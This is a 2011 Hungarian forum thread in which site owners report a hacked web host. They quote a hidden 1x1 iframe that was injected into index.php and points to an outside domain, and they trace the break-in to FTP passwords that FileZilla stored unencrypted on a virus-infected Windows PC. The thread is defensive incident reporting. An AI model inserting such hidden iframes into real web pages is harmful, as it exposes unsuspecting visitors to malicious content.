Feltört webtárhely

Beküldte Anonymous (nem ellenőrzött) - 2011. május 16. 10.01

Ma reggel az egyik ügyfelem [tárhelyszolgáltató neve törölve] tárhelyén ezt találtam az index.php fáljok elején:

<iframe src="http://gratwall.vv.cc/showthread.php?t=80480463" width="1" height="1" frameborder="0"></iframe>

Először gzip tömörítési problémára gyanakodtam, mert a címlapot lekérve ilyen hibaüzenetek jöttek:

Chrome: 330net::ERR_CONTENT_DECODING_FAILED
Safari: cannot decode raw data” (CFURLErrorDomain:-1015)

Közben kiderült, hogy a tárhelyet nyilvánvalóan feltörték, és a fenti kódot szúrták be az index.php elejére. Elképzelhető, hogy a látszólagos tömörítési probléma mögött is a feltörés áll, bár nem kizárt, hogy két külön problémával állunk szemben.

Ha náluk van a webhelyed, szedd ki a fenti iframe kódot az index.php elejéről, és jelezd a problémát az ügyfélszolgálatnak.

Fórum:

Hoszting kérdések

Joomla is szintén zenész

Permalink Beküldte Illyés Edit (nem ellenőrzött) - 2011. május 16. 10.10

Úgy tűnik Joomlákat is törtek, tehát biztosan nem Drupal probléma.

A hozzászóláshoz regisztráció és bejelentkezés szükséges

FileZilla jelszótárolás

Permalink Beküldte Illyés Edit (nem ellenőrzött) - 2011. május 16. 12.15

Újabb fejlemények: ügyfél Windows Vista gépe a hétvégén beszedett valami vírust, és le volt tárolva a FileZillában a jelszó. Lehet (valószínű), hogy innen indult a betörés, és nem a tárhelyszolgáltató szerveréről.

Tanulságok: a FileZilla 3-as, hasonlóan más FTP programokhoz, kódolatlanul, egyszerű xml fájoklban tárolja a jelszavakat és más bejelentkezési információkat. (Ez megváltozott, a 2-esben még megvolt a kódolás.) Windows gépeken ez különösen problematikus. Ne mentsük le a jelszavakat, ez a legegyszerűbb megoldás.